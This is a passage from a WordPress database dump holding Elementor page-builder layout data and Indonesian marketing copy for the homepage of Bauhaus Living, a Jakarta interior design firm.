"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\" Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living\",\"title\":\"Wujudkan mimpi anda sekarang!\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4513,4970,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4514,4970,'_elementor_pro_version','3.8.1'),(4515,4970,'_elementor_css','a:6:{s:4:\"time\";i:1695377587;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4516,4971,'_wp_page_template','elementor_header_footer'),(4517,4971,'_elementor_edit_mode','builder'),(4518,4971,'_elementor_template_type','wp-page'),(4519,4971,'_elementor_version','3.8.1'),(4520,4971,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan 